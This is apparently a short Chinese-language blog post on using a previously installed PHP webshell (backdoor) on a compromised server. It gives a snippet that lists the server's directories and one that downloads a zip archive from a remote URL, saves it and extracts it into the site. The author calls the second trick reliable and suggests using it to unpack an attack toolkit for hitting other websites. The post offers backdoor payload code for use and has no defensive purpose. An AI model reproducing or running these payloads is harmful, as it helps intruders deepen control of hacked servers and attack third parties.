上篇文章我们介绍了我推荐的WebShell，这篇我们来说说如何通过这个WebShell干一些其他事，这篇文章里我就不说访问啥了，直接放代码

1.使用后门获取目录信息

这个不多说，有PHP基础的应该都会用

$dir =  dirname(__FILE__);$file = scandir($dir);echo " <pre>";print_r($file);

这个dirname(__FILE__)是可以更改为相对路径的，比如你的后门在3层目录中，可以将$dir赋值为../../，所得结果将以一个数组print出来。
像这样

2.使用后门解压，释放文件

这个方法我其实是不想分享出来的。毕竟屡试不爽嘛，其实很简单，代码如下

$down=file_get_contents('http://压缩包下载地址.zip');file_put_contents('update.zip',$down);$zip = new ZipArchive; $zip->open('./update.zip') && $zip->extractTo('../');

这个方法能用来解压可到云之类的在线文件管理，当然，也可以解压个攻击工具包，然后对其它网站进行压测。

其他的东西我就不说了，还有什么其他玩法，我们就笑看大佬了